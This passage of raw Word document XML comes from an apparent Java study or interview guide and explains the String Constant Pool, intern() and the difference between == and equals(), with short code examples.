          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="4C823282" w14:textId="736A6A87" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24" w:rsidP="00834B9A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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String Constant Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (aka </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Intern Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) is a special memory area inside the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java stores all string literals</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to optimize memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D87853" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C03F24">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2E2EFFD">
          <v:rect id="_x0000_i1117" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="408CCC7D" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24" w:rsidP="00C03F24">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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748DA40F" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24" w:rsidP="00C03F24">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do:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F58E34" w14:textId="77777777" w:rsidR="000C4649" w:rsidRPr="00CE4B95"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9639533"/>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Java"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125D3BA2" w14:textId="77777777" w:rsidR="000C4649" w:rsidRPr="00CE4B95"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9639533"/>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Java"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC5680E" w14:textId="77777777" w:rsidR="000C4649" w:rsidRPr="00CE4B95"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9639533"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Java"</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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> stored only once </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> th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pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3935AF63" w14:textId="77777777" w:rsidR="000C4649" w:rsidRPr="00CE4B95"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9639533"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Both</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> s1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> s2 will point to the same memory reference</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B963BAF" w14:textId="77777777" w:rsidR="000C4649" w:rsidRPr="00CE4B95"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9639533"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C5B65D" w14:textId="77777777" w:rsidR="000C4649" w:rsidRPr="00CE4B95"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9639533"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">s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2    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// true (same object)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5898419B" w14:textId="0F94DB00" w:rsidR="000C4649" w:rsidRPr="00CE4B95"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9639533"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s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qual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rue (same content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3C739D" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C03F24">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71D8AFD">
          <v:rect id="_x0000_i1118" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="592C42B3" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24" w:rsidP="00C03F24">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ere is the pool stored?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12079FD4" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24" w:rsidP="00C03F24">
      <w:p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 heap memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>separately managed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498B307A" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24" w:rsidP="00C03F24">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Pre-Java 7: Stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PermGen</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCF9574" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24" w:rsidP="00C03F24">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Java 7+: Moved to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>heap space</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (more flexible).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A57AE0" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C03F24">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369C9BA">
          <v:rect id="_x0000_i1119" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1867C768" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24" w:rsidP="00C03F24">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en a new String is created with new:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C379E2" w14:textId="77777777" w:rsidR="000C4649" w:rsidRPr="00CE4B95"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077943"/>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Java"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E277B7D" w14:textId="77777777" w:rsidR="000C4649" w:rsidRPr="00CE4B95"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077943"/>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Java"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB94094" w14:textId="77777777" w:rsidR="000C4649" w:rsidRPr="00CE4B95"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077943"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">s1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a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objec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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the he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outside the pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEF4342" w14:textId="77777777" w:rsidR="000C4649" w:rsidRPr="00CE4B95"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077943"/>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s2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i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rom</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4236E9" w14:textId="4A5D1C86" w:rsidR="000C4649" w:rsidRPr="00CE4B95"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077943"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>So</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> s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Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoj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but s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qual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Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoj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ue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31684085" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C03F24">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C6CB8C9">
          <v:rect id="_x0000_i1120" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07800131" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24" w:rsidP="00C03F24">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How to manually put strings into the pool?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BA643B" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24" w:rsidP="00C03F24">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Use intern():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD17399" w14:textId="77777777" w:rsidR="000C4649" w:rsidRPr="00CE4B95"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7619396"/>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ell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tern</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4C7C5C" w14:textId="77777777" w:rsidR="000C4649" w:rsidRPr="00CE4B95"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7619396"/>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Hello"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634BD612" w14:textId="77777777" w:rsidR="000C4649" w:rsidRPr="00CE4B95"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7619396"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611FC2B6" w14:textId="0D9A2D0D" w:rsidR="000C4649" w:rsidRPr="00CE4B95"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7619396"/>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s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rue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3558C7FF" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24" w:rsidP="00C03F24">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Benefits of String Pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FD45AD" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>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efficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Avoids duplicate string literals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7466BA20" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>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erformance boost</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Comparisons with == are faster than .equals().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149EA83C" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24" w:rsidP="00C03F24">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Important Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A8C9FC" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>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ly string literals are automatically pooled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57598743" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00C03F24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>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ring pool is managed by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — no need for manual cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A6F074" w14:textId="77777777" w:rsidR="00C03F24" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C03F2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E415C64">
          <v:rect id="_x0000_i1121" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5152331D" w14:textId="7D760784" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="00FB1EA9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc196307508"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the difference between equals</w:t>
      </w:r>
      <w:r w:rsidR="004A5252" w:rsidRPr="00CE4B95">
        <w:rPr>
